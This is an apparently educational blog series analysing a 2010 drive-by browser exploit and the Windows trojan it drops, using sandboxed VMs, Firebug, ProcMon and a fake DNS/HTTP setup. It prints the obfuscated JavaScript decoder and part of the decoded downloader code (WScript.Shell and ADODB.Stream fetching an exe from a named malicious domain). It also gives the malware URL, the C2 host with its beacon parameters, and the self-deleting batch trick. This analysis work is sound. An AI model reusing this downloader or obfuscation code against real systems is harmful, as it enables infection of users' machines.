Malware Analysis Walking Tour (The Payload)

Monday, March 8th, 2010

If you’re just tuning in, this is the third post in a series. Check out the beginning of the Malware Analysis Walking Tour to see how we got here.

Also, if you’re doing this for anything other than your own edification, there are *much* faster ways to go about many of these steps. Wes Brown of IOActive recently gave an excellent talk on his malware analysis toolkit at BSides SF.

The Payload

Someone went to a lot of trouble to get this SgwAg.exe on the machine. The question is why: Spam? Porn? Advertising? Botnet?

First off, we’ll need a copy of the exe. Since none of the nasty bits of the exploit code actually ran on the Linux machine, we’ll have to go fetch the exe manually. We saw the URL for it in the decoded exploit code, so we can grab it easily enough:

$ wgetasie -O SgwAg.exe.INFECTED http://nevpizdy-nenyznie50domain.in/feedback.php?page=1
[...]
2010-01-04 19:19:37 (63.2 KB/s) - 'SgwAg.exe.INFECTED' saved [84992/84992]
$ file SgwAg.exe.INFECTED
SgwAg.exe.INFECTED: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Here I used the file command for a quick check that I did indeed get a Windows executable back. One step that’s quick and easy is to simply dump the strings in the file. Sometimes this tells us nothing, sometimes it tells us a lot.

$ strings SgwAg.exe.INFECTED | more
[...]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
<assemblyIdentity 
    version="1.0.0.0" 
    processorArchitecture="X86" 
    name="Sandboxie" 
    type="win32" 
<description>Sandboxie</description> 
[...]
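
For readers without the strings utility handy, the same idea fits in a few lines of Python. This is only a rough sketch: the function name ascii_strings and the 4-character minimum are assumptions for illustration, and it looks for plain ASCII runs only, so it will not match the real tool's output exactly.

```python
import re

def ascii_strings(data: bytes, min_len: int = 4):
    """Yield runs of printable ASCII that are at least min_len bytes long."""
    # 0x20-0x7e is the printable ASCII range (space through tilde).
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.group().decode("ascii")

# Hypothetical usage against the downloaded sample:
# with open("SgwAg.exe.INFECTED", "rb") as handle:
#     for text in ascii_strings(handle.read()):
#         print(text)
```

Wide (UTF-16) strings, which are common in Windows binaries, would need a second pattern.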

Hmmm… it is, was, contains, or is meant to look like something called “Sandboxie”. Looking at the properties on my Windows VM seems to back this up.

Well, that’s just too weird to pass up. Ordinarily at this point I’d be deciding on whether to deadlist in IDA or step through it in OllyDbg, but if some part of this malware is actually borrowed code then we stand to learn a lot by checking out what functionality is being ripped off.

I found the Sandboxie site, grabbed the release indicated by the PE version info (3.26), and installed it on a VM. Then I took an md5 sum of Start.exe (from the official Sandboxie release) and of the malware SgwAg.exe.

$ md5sum Start.exe SgwAg.exe.INFECTED
70c8e29228870ae7d5da6f457b9b395d  Start.exe
39990427da35c7625764c0e6f262a299  SgwAg.exe.INFECTED
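
The same comparison can be scripted when there are more than a couple of files to check. A minimal sketch using Python's hashlib; the helper names md5_of and same_file are made up for this example.

```python
import hashlib

def md5_of(path, chunk_size=65536):
    """Return the hex MD5 digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        # iter() with a sentinel keeps reading until read() returns b"".
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def same_file(path_a, path_b):
    """True when both files hash to the same MD5 digest."""
    return md5_of(path_a) == md5_of(path_b)

# Hypothetical usage:
# print(same_file("Start.exe", "SgwAg.exe.INFECTED"))
```

MD5 is fine for a quick "are these identical" check like this one, though it should not be relied on where deliberate collisions are a concern.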

Okay, so they’re not actually the same piece of code. No info about why the malware looks like Sandboxie, but hopefully that will become evident later. Just in case, I run both of them through the Binary Diffing Suite; there are a lot of changes, too many to list. I also put them through BinDiff in IDA to see if there are any parts that are actually the same.

Only two functions “match” in name/parameter heuristics, but a quick glance at the graph view shows that these are red herrings. The yellow nodes with red outlines in the callgraph are ones that match no nodes in the other, supposedly similar, function. So, this malware was just supposed to look like Sandboxie Start.exe from the outside.

Since I don’t think there’s much more I can learn by staring at the surface of the file, it’s again time to make the decision: run or read? I can put the exe in a disposable environment, run it, and debug/profile it, or disassemble it and see what I find. I’ve done a lot of the “running it” approach, so I look at IDA Pro to see what the code has to say. Checking what functions are imported and what functions are defined is an informative first step.

Awesome. I see socket(), bind(), and listen(), the three bad boys of becoming a server. Since I’m not much of a Windows programmer, nothing else rings a bell, so it’s time to read up on the rest of these functions and see what else this binary is equipped to do. The other problem is that while these functions are imported, they’re not actually used anywhere. That, plus some huge swaths of bytes that IDA didn’t recognize as instructions or data, stinks of more packed or encoded/polymorphic code.

I run PEiD on the binary to see if it recognizes any common packer; nothing is identified. Oh well, it was worth a try.

[TODO – Finish writing SgwAg analysis; unpacking routine and antidebugging]

We’ve put it off long enough; it’s time to run this sucker. I copy the file over to a test VM and prepare to run it:

  • Switch the VMware guest to host-only networking
  • Take a filesystem and registry snapshot using InstallWatch Pro
  • Snapshot the VM
  • Run Wireshark on the VMware host so we can see anything that the malware attempts to connect to
  • Run a fake DNS to resolve all names to the VM Host
  • Run a fake HTTP server on the VM Host to log and respond to all requests
  • Start ProcMon and filter out activity that will flood the logs
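
The fake HTTP server in the list above does not need to be anything fancy. The following is a minimal Python 3 sketch of such a server, not the script used for this post; the names LoggingHandler and make_server are assumptions for illustration. It answers every GET and POST with an empty 200 and prints what was asked for.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class LoggingHandler(BaseHTTPRequestHandler):
    """Log each request, then reply 200 with an empty body."""

    def _log_and_reply(self):
        # Drain any request body so the client is not left waiting.
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length) if length else b""
        print("Saw %s request: %s" % (self.command, self.path))
        print(self.headers)
        if body:
            print("Body: %d bytes" % len(body))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    # Treat GET and POST identically.
    do_GET = _log_and_reply
    do_POST = _log_and_reply

def make_server(host="0.0.0.0", port=80):
    """Build (but do not start) the server; port 80 usually needs privileges."""
    return HTTPServer((host, port), LoggingHandler)

# Hypothetical usage on the VM host:
# make_server().serve_forever()
```

Combined with a DNS responder that resolves every name to the host, this is enough to see where a sample tries to phone home without letting any traffic out.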

Double click and… the file disappears. Hmm, that was anticlimactic. Did it do anything before erasing itself? I stop ProcMon and save the full logs, then filter for anything done by SgwAg.exe, and save again. The log shows that it was very busy indeed; a bit over 2000 logged actions before it exited, and several process creations.

We look through this and see that it’s doing a number of things, including reading out large chunks of itself.

ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 2,560, Length: 1,024
ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 1,024, Length: 1,536
ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 4,096, Length: 16,384
ReadFile	C:\binaries_for_analysis\SgwAg.exe	SUCCESS	Offset: 20,480, Length: 16,384
[...and later...]
CreateFile	C:\WINDOWS\packycfg.dll	SUCCESS	OpenResult: Created
WriteFile	C:\WINDOWS\packycfg.dll	SUCCESS	Offset: 0, Length: 35,328
CloseFile	C:\WINDOWS\packycfg.dll	SUCCESS
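
Adding up the Length fields of the four reads is quick to do by hand, but a short sketch shows the arithmetic. The READS list simply copies the detail column from the log lines above; the function name total_length is made up for this example.

```python
import re

# Detail column of the four ReadFile entries shown in the ProcMon log.
READS = [
    "Offset: 2,560, Length: 1,024",
    "Offset: 1,024, Length: 1,536",
    "Offset: 4,096, Length: 16,384",
    "Offset: 20,480, Length: 16,384",
]

def total_length(details):
    """Sum the 'Length: N' values, ignoring the thousands separators."""
    total = 0
    for line in details:
        match = re.search(r"Length: ([\d,]+)", line)
        total += int(match.group(1).replace(",", ""))
    return total

print(total_length(READS))  # 35328, the same size as the WriteFile to packycfg.dll
```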

Now, it could be a coincidence that the malware reads out four chunks of itself totaling 35,328 bytes, then writes out a brand new 35,328 byte file, but I’m going to go with “highly unlikely”. We’ll have to get a copy of that and analyze it as well. However, that does save us time discovering and reversing the packing scheme that was used (since PEiD didn’t recognize it). Only one other file gets written:

WriteFile	C:\binaries_for_analysis\abcdefg.bat	SUCCESS	Offset: 0, Length: 50
[… and later …]
Process Create	C:\WINDOWS\system32\cmd.exe	SUCCESS	PID: 1152, Command line: cmd /c 	""C:\binaries_for_analysis\abcdefg.bat" "C:\binaries_for_analysis\SgwAg.exe""

This is a pretty standard pattern. If a binary wants to delete itself the usual approach is to write a batch file with instructions to delete it, then terminate, and let the batch file clean up. This particular flavor looped while checking if the second argument existed, trying to delete it each time.

While I’m saving logs from ProcMon and InstallWatch I notice that the dummy DNS and HTTP servers I set up are suddenly showing lots of requests.

pyminifakeDNS:: dom.query. 60 IN A 192.168.62.1
Respuesta: in.webstat44.com. -> 192.168.62.1

The Fake DNS (from http://code.activestate.com/recipes/491264/) did its job; the malware requested resolution of “in.webstat44.com” and it got the IP of the VM host. It then makes some HTTP POST and GET requests.

DummyHTTP ready.
 
Saw POST request:
Content-Type: multipart/form-data; boundary=--------------------------cd4d11cd4d11cd4d11
User-Agent: IE
Host: in.webstat44.com
Content-Length: 317
Cache-Control: no-cache 
 
PTHOMAS-MALWARE - - [11/Jan/2010 16:34:49] "POST /cgi-bin/forms.cgi HTTP/1.1" 200 -
 
Saw GET request:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; .NET4.0C; .NET4.0E)
Host: in.webstat44.com
Connection: Keep-Alive 
 
PTHOMAS-MALWARE - - [11/Jan/2010 16:34:54] "GET /cgi-bin/options.cgi?user_id=1426383534&version_id=38&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=38&crc=00000000 HTTP/1.1" 200 -
 
Saw GET request:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; .NET4.0C; .NET4.0E)
Host: in.webstat44.com
Connection: Keep-Alive 
 
PTHOMAS-MALWARE - - [11/Jan/2010 16:35:08] "GET /cgi-bin/options.cgi?user_id=1426383534&version_id=38&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=38&crc=00000000 HTTP/1.1" 200 -
 
[...many more of this request...]

Hmm, the exe took its sweet time there; from initial run (16:10:03) to first phone home (16:34:49) was a bit over 24 minutes. Some checks online show that “in.webstat44.com” was listed on various malware domain blacklists a while ago and has since gone offline. Cool; score one for the good guys. That leaves us with just the newly written packycfg.dll to analyze.
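
The repeated GET to options.cgi is worth pulling apart, since the query string shows what the malware reports about itself. A small sketch using Python's urllib.parse; beacon_fields is a made-up helper name, and html.unescape is there only in case the log line was copied with HTML-escaped ampersands.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Request path as it appears in the fake HTTP server's log.
REQUEST_PATH = ("/cgi-bin/options.cgi?user_id=1426383534&version_id=38"
                "&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=38&crc=00000000")

def beacon_fields(path):
    """Return the query parameters of a logged request path as a dict."""
    query = urlsplit(html.unescape(path)).query
    # parse_qs returns a list per key; each key appears once here.
    return {name: values[0] for name, values in parse_qs(query).items()}

fields = beacon_fields(REQUEST_PATH)
for name, value in fields.items():
    print(name, "=", value)
```

What the server would have done with user_id, passphrase, and socks is not something the logs can tell us; the names are only suggestive.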

Okay then, we have what we need. I zip up all the logs, output, and packycfg and move them off the VM, then revert it to the snapshot.


Next Up: The Real Payload

Malware Analysis Walking Tour

Tuesday, February 23rd, 2010

Part of my day job lately has been to build up a catalog of drive-by browser exploits and so I decided to put up some notes on the process. When I first started taking apart malware, the detailed examples I found online were invaluable, so I’m putting this up partly to try to give back and partly to try to make the whole process a little more accessible to the interested but not-quite-as-technical reader. Feel free to post a reply or contact me with questions or comments.

Getting Started

Sometimes finding a piece of malware to examine can be the first hurdle in doing any analysis. Here we have it pretty easy; we run a malware scanner that crawls the net with a swarm of unpatched virtual machines and monitors them to detect unusual behavior. When one of them exhibits symptoms of malware we can dump information about what happened to the machine, restore it from a snapshot, and send it back out to continue trawling.

Here we can see that the root page of nevpizdy-nenyznie50domain.in caused some suspect behavior on an unpatched XP/IE6 VM. Let’s take a look at what happened.

The static analysis came back clean. No real surprise there, since static analysis is a coarse-grained, best effort type approach; it picks up the obvious stuff, but it’s easy to fool. This exploit is going to be worth looking into, if for no other reason than it will help us refine our static analysis detections.

Runtime (aka dynamic) analysis is where we’re really going to see stuff happen. Here we see a new process being executed from some binary file that shouldn’t be there; whatever the exploit is, the words “arbitrary code execution” are going to show up in the description.

I don’t know where that file came from at this point; best guess is that it’s being downloaded from some remote site rather than manufactured by logic on the page. We’ll see.

Time to get out of the GUI and get our hands dirty. Before I get to the code, a word of warning: don’t go visit these URLs. They’ve demonstrably owned a machine already, so unless you really want to know if it happens every time you should probably keep your hands in your pockets on this one.

$ mkdir nevpizdy-nenyznie50domain.in
$ cd nevpizdy-nenyznie50domain.in/
$ touch notes
$ wgetasie http://nevpizdy-nenyznie50domain.in
$ chmod -w index.html
$ less index.html
<html><body><div style="display: none"><ul><li
id="khBsFxi">153n168Q161h150s167b156H162S161s83v118K162K160c163U159w152a167I152y91t92i61y174b61Q83Z83F83b83V166n152I167D135i156d160r152z162K168k167a91R90D159T162N150O148d167q156i162a161R97r155Z165K152Z153X83m112p83w85s148R149S162f168Z167W109O149C159N148O161N158y85p90e95B83I100s99P99m99i99y92M110z61q176l61K61P15
3J168w161F150G167p156X162Y161U83w122u162j91z148I92x61M174G61m83r83I83v83k169Y148h165T83W166u83T112N83g118d165c152p148a167i152w130P91F148U95k83C90P138U134C150Y165R156P163e167E97H134n155z152r159L159h90L92i110b61e83v83H83I83Y169x148j165G83t162y83M112O83j118O165d152D148Q167C152V130g91h148a95n83U90a116e119f130H119q1
[...]

Hmm, clearly some obfuscated exploit code, but doesn’t look like an encoding I’ve seen before. There’s a lot of that junk (full content in Appendix 1 of this pdf if you want to follow along), but what comes after is more immediately interesting (if horribly ugly):

 
<script>function zacabab (abeicd) { var terry = abeicd.split(':'); var merry = 'zxc'; return terry[2];};</script>
<script>
 var FhcL0z0 = new String(""); FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
g6VZ13w8 = document.lastModified; k0miOe5c = zacabab(g6VZ13w8); FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');
function aXzLA9jbkkRMIW ( OzNL6t,em7lqjVq ) { var AYMQGuD7 = new String();var bsL1aXtpUc = new String();
 var mXhEn59Xi = OzNL6t.split(';'); for(euWM8 = 0;euWM8 < mXhEn59Xi.length-1;euWM8++)
 { AYMQGuD7 = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')](mXhEn59Xi[euWM8] - em7lqjVq);
bsL1aXtpUc = bsL1aXtpUc + AYMQGuD7;} return bsL1aXtpUc;}var vnfjqq = Date();LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);
var mXhEn59Xi = 'AYMQGuD7';function krasddk(zxc) {eval(zxc); return;};krasddk( LCEsM );</script>

This is the decoding part of the script (or a pretty-printed version in Appendix 2 of the pdf). So, there are two ways to do this right now; one is to carefully take this script apart and manually decode it piece by piece, the other is to let it do its thing in a JavaScript debugger and just grab whatever it decodes from memory. The latter is a lot faster.

Since this is a payload that targets Windows machines and I’m on a reduced privilege account on a Linux machine, it’s reasonable to let this thing run. Just in case, I take a moment to switch Firefox to use Paros proxy so that if the script makes any requests I can record them and then drop them.

I open up Firebug on a blank page, set “Break on Next”, and then load the index.html that I pulled down with wget. When the page has finished rendering, I take a look at the DOM to see if anything jumps out at me; in this case, something does.

FhcL0z0 = "153;168;161;150;167;156;162;161;83;118;162;160;163;159;152;167;152;91;92;61;174;61;83;83;83;83;166;152;167;135;156;160;152;162;168;167;91;90;159;162;150;148;167;156;162;161;97;155;165;152;153;83;112;83;85;148;149;162;168;167;109;149;159;148;161;158;85;90;95;83;100;99;99;99;99;92;110;61;176;61;61;153;168;161[…]

So FhcL0z0 is now interesting. Where did it come from?

FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');

Remember the <li> that started out with “153n168Q161h150s167…”? It turns out that strange looking “encoding” scheme was just sticking random letters between the sets of numbers. This is a case where code reading could have turned up the info just as quickly as running the script: two methods, both will usually work.
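
The JavaScript replace() call translates directly to Python. A tiny sketch, with normalize as a made-up name, run on the first few values of the list item:

```python
import re

def normalize(inner_html):
    """Python equivalent of FhcL0z0.replace(/[^0-9]/g, ';')."""
    # Every character that is not a digit becomes a ';' separator.
    return re.sub(r"[^0-9]", ";", inner_html)

print(normalize("153n168Q161h150s167"))  # 153;168;161;150;167
```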

The nice thing about running it is that there’s still lots of stuff in the DOM to look at. Back to Firebug:

LCEsM =function Complete()
{
    setTimeout('location.href = \"about:blank\"', 10000);
}
function Go(a)
{
    var s = CreateO(a, 'WScript.Shell');
    var o = CreateO(a, 'ADODB.Stream');
    var e = s.Environment('Process');
    var urltofile = 'http://nevpizdy-nenyznie50domain.in/feedback.php?page=1';
    var filename = 'hgivV.exe';
    var xhr = null;
    var bin = e.Item('TEMP') + '\\' + filename;
[...]

Hey, that’s nice. There’s only one layer of obfuscation going on here; once we get through the junk in FhcL0z0, it’s pretty readable (they even left the linebreaks in, how thoughtful). This is the code that actually performs the exploit; it gets executed via a gently-obfuscated eval() call at the end of the script tag: krasddk( LCEsM );
We don’t really need to know at this point, but it might be instructive to figure out where LCEsM came from.

LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);

Long story short, LCEsM is produced by decoding FhcL0z0 using a function and a key. The function is a simple for-loop that walks the input string and executes an obfuscated call to fromCharCode. The key comes from:

g6VZ13w8 = document.lastModified;
k0miOe5c = zacabab(g6VZ13w8);

The zacabab() function just splits the date at each “:” and returns the third piece, which is the seconds field. Firebug tells me that the last modified date of the file is “12/28/2009 14:42:51” (and examining g6VZ13w8 and k0miOe5c confirms this); therefore the key needed to decode it is 51. A quick check verifies that we understand the encoding scheme.

$ python
>>> encoded = "153;168;161;150;167;156;162;161"
>>> "".join([chr(int(c) - 51) for c in encoded.split(";")])
'function'
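
To tie the pieces together, here is a slightly longer sketch that derives the key the way zacabab() does and then decodes a semicolon-separated string. The Python function names are made up for this example, and it is not an exact port: the JavaScript loop stops one element short of the end, while this version skips empty pieces instead.

```python
def key_from_last_modified(last_modified):
    """Mirror zacabab(): split on ':' and take the third piece (the seconds)."""
    return int(last_modified.split(":")[2])

def decode(normalized, key):
    """Mirror aXzLA9jbkkRMIW(): subtract the key from each number, then chr().

    Empty pieces, such as the one after a trailing ';', are skipped.
    """
    return "".join(chr(int(n) - key) for n in normalized.split(";") if n)

key = key_from_last_modified("12/28/2009 14:42:51")
sample = "153;168;161;150;167;156;162;161;83;118;162;160;163;159;152;167;152;91;92;"
print(key)                  # 51
print(decode(sample, key))  # function Complete()
```

The decoded text matches the start of what Firebug showed for LCEsM.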

As an aside, this is a perfect example of why DRM is ultimately a losing battle; if you provide someone with the ciphertext, the scrambling method, and the key, then you have provided them with everything they need to compromise your system. It works the same no matter if you’re a blackhat or a movie studio.

Back to the analysis: a quick bravo is in order for the folks behind wget. It correctly preserved the Last Modified date while saving the page to the filesystem; without that, there would have been a lot more trial and error in figuring out the key. Thanks Hrvoje Niksic and Micah Cowan!

$ stat index.html
[...]
Modify: 2009-12-28 14:42:51.000000000 -0800
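
Because the modification time survives on disk, the key can also be read straight from the saved file. A minimal sketch, assuming the page was saved with its original timestamp and that the local timezone offset is a whole number of minutes (so the seconds field is unaffected); key_from_mtime is a made-up name.

```python
import os
from datetime import datetime

def key_from_mtime(path):
    """Return the seconds field of a file's modification time."""
    modified = datetime.fromtimestamp(os.path.getmtime(path))
    return modified.second

# Hypothetical usage on the page saved earlier:
# print(key_from_mtime("index.html"))
```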

It seems that the detour to figure out how LCEsM was encoded was time well spent. We learned about an interesting obfuscation scheme (using lastModified) and learned that wget easily mitigates it. We can add this sort of information to static detections to correlate different exploits encoded by the same toolkit and do trending on related malware.

Next Time: The Exploit